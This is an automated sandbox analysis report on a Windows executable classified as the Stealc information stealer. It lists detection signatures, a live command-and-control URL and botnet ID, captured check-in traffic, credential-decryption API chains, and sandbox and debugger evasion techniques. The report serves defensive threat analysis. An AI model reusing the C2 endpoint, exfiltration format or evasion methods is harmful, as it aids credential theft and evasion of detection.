
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525191
MD5: edecdb123ba6a0d389ff9b2993754c49
SHA1: d27897486ab7cd802f52731b1e98b9b463854fc0
SHA256: c1af8de0dbb010738eacb3fa66d5c3f1ea70ce1c480ac116ccd6bbfec781b1d1
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EDECDB123BA6A0D389FF9B2993754C49)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches:
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 5588 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 5588 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.460000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T20:46:02.261931+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.460000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0046C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00467240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00467240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00469AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00469AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00469B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00469B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00478EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00478EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_004738B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00474910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0046DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0046E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00474570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0046ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0046BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0046DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004616D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046F68A FindFirstFileA | 0_2_0046F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00473EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00473EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0046F6B0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 46 45 44 30 37 44 31 37 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a
    Data Ascii:
    ------GIEBAECAKKFCBFIEGCBK
    Content-Disposition: form-data; name="hwid"

    DDFED07D170E1845150070
    ------GIEBAECAKKFCBFIEGCBK
    Content-Disposition: form-data; name="build"

    doma
    ------GIEBAECAKKFCBFIEGCBK--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00464880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00464880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 46 45 44 30 37 44 31 37 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a
    Data Ascii:
    ------GIEBAECAKKFCBFIEGCBK
    Content-Disposition: form-data; name="hwid"

    DDFED07D170E1845150070
    ------GIEBAECAKKFCBFIEGCBK
    Content-Disposition: form-data; name="build"

    doma
    ------GIEBAECAKKFCBFIEGCBK--
Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2094357724.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2094357724.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094357724.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2094357724.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37a

                System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 | 0_2_0082E095
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FE859 | 0_2_006FE859
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00815178 | 0_2_00815178
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CF201 | 0_2_007CF201
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C8A9E | 0_2_007C8A9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072FB7E | 0_2_0072FB7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008273D5 | 0_2_008273D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00834CDE | 0_2_00834CDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082FC7E | 0_2_0082FC7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082C50D | 0_2_0082C50D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007866B3 | 0_2_007866B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00833654 | 0_2_00833654
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082979E | 0_2_0082979E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072B754 | 0_2_0072B754
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D7FEC | 0_2_006D7FEC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083175A | 0_2_0083175A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E3F62 | 0_2_008E3F62
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004645C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nqjulsar ZLIB complexity 0.9948356094479005
Source: file.exe, 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00479600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00473720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00473720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q9XDFATE.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1802752 > 1048576
Source: file.exe | Static PE information: Raw size of nqjulsar is bigger than: 0x100000 < 0x191e00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.460000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nqjulsar:EW;snoulpuy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nqjulsar:EW;snoulpuy:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00479860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bc2d6 should be: 0x1bae13
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: nqjulsar
Source: file.exe | Static PE information: section name: snoulpuy
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F8882 push eax; mov dword ptr [esp], edx | 0_2_008F88A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F8882 push 4303AB69h; mov dword ptr [esp], eax | 0_2_008F88C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 1A2CFDA4h; mov dword ptr [esp], esi | 0_2_0082E0B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 36CD470Dh; mov dword ptr [esp], ebp | 0_2_0082E164
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 46D248A3h; mov dword ptr [esp], eax | 0_2_0082E19A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 17D96FC9h; mov dword ptr [esp], ecx | 0_2_0082E1C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 7A07E277h; mov dword ptr [esp], ecx | 0_2_0082E207
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ebx; mov dword ptr [esp], ecx | 0_2_0082E2DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 13B4F4DDh; mov dword ptr [esp], eax | 0_2_0082E3AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ebp; mov dword ptr [esp], 482AC16Bh | 0_2_0082E436
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push edx; mov dword ptr [esp], ebp | 0_2_0082E481
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 3A46DA51h; mov dword ptr [esp], ebp | 0_2_0082E4A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 18FB8425h; mov dword ptr [esp], esi | 0_2_0082E5A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 14947EE4h; mov dword ptr [esp], ecx | 0_2_0082E68C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ebp; mov dword ptr [esp], eax | 0_2_0082E6F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ecx; mov dword ptr [esp], esi | 0_2_0082E711
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push eax; mov dword ptr [esp], 27FE0277h | 0_2_0082E843
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push esi; mov dword ptr [esp], edx | 0_2_0082E8BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 032DE914h; mov dword ptr [esp], eax | 0_2_0082E8CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 7BA50680h; mov dword ptr [esp], esp | 0_2_0082E94B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push eax; mov dword ptr [esp], ecx | 0_2_0082E9C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 160D26C3h; mov dword ptr [esp], ecx | 0_2_0082EA07
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ebx; mov dword ptr [esp], ecx | 0_2_0082EA4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push edx; mov dword ptr [esp], esi | 0_2_0082EADB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push edx; mov dword ptr [esp], 56DD6B87h | 0_2_0082EADF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 57B96900h; mov dword ptr [esp], esi | 0_2_0082EB2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ebx; mov dword ptr [esp], 0C8463B8h | 0_2_0082EB6D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push edi; mov dword ptr [esp], 75B4F840h | 0_2_0082EB87
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ebp; mov dword ptr [esp], edi | 0_2_0082EC27
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push 3B1621C9h; mov dword ptr [esp], ecx | 0_2_0082EC74
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082E095 push ecx; mov dword ptr [esp], esi | 0_2_0082ED0F
Source: file.exe | Static PE information: section name: nqjulsar entropy: 7.953541884791292

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00479860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13746
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1B39, second address: 6C1B3F, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1B3F, second address: 6C1B44, instructions: 0x00000000 rdtsc; 0x00000002 push esi; 0x00000003 push eax; 0x00000004 push edx; 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 838D95, second address: 838D9E, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 pushad; 0x00000007 push eax; 0x00000008 push edx; 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 838D9E, second address: 838DA6, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push eax; 0x00000005 pop eax; 0x00000006 push eax; 0x00000007 push edx; 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 839341, second address: 839364, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 jc 00007F57D451A1B6h; 0x0000000a jne 00007F57D451A1B6h; 0x00000010 popad; 0x00000011 push ecx; 0x00000012 jnp 00007F57D451A1B6h; 0x00000018 pop ecx; 0x00000019 push eax; 0x0000001a push edx; 0x0000001b pushad; 0x0000001c popad; 0x0000001d jno 00007F57D451A1B6h; 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 839364, second address: 839377, instructions: 0x00000000 rdtsc; 0x00000002 jg 00007F57D4F134D6h; 0x00000008 ja 00007F57D4F134D6h; 0x0000000e pop edx; 0x0000000f pop eax; 0x00000010 pushad; 0x00000011 push eax; 0x00000012 push edx; 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C2A2, second address: 6C1B39, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 popad; 0x00000007 pop eax; 0x00000008 mov edx, dword ptr [ebp+122D1BA2h]; 0x0000000e push dword ptr [ebp+122D06B5h]; 0x00000014 movsx ecx, bx; 0x00000017 call dword ptr [ebp+122D2B51h]; 0x0000001d pushad; 0x0000001e cmc; 0x0000001f xor eax, eax; 0x00000021 jo 00007F57D451A1C7h; 0x00000027 jmp 00007F57D451A1C1h; 0x0000002c mov edx, dword ptr [esp+28h]; 0x00000030 pushad; 0x00000031 mov ebx, eax; 0x00000033 mov esi, dword ptr [ebp+122D3A3Ah]; 0x00000039 popad; 0x0000003a mov dword ptr [ebp+122D396Ah], eax; 0x00000040 sub dword ptr [ebp+122D24E2h], ebx; 0x00000046 mov esi, 0000003Ch; 0x0000004b mov dword ptr [ebp+122D18C9h], ecx; 0x00000051 jmp 00007F57D451A1BAh; 0x00000056 add esi, dword ptr [esp+24h]; 0x0000005a stc; 0x0000005b pushad; 0x0000005c jmp 00007F57D451A1C9h; 0x00000061 mov esi, 50056AF6h; 0x00000066 popad; 0x00000067 lodsw; 0x00000069 pushad; 0x0000006a sbb di, 5179h; 0x0000006f xor dword ptr [ebp+122D1FE5h], ecx; 0x00000075 popad; 0x00000076 add eax, dword ptr [esp+24h]; 0x0000007a cmc; 0x0000007b mov dword ptr [ebp+122D364Eh], eax; 0x00000081 mov ebx, dword ptr [esp+24h]; 0x00000085 sub dword ptr [ebp+122D364Eh], edx; 0x0000008b nop; 0x0000008c push eax; 0x0000008d push edx; 0x0000008e push eax; 0x0000008f push edx; 0x00000090 pushad; 0x00000091 popad; 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C3C3, second address: 83C3C7, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
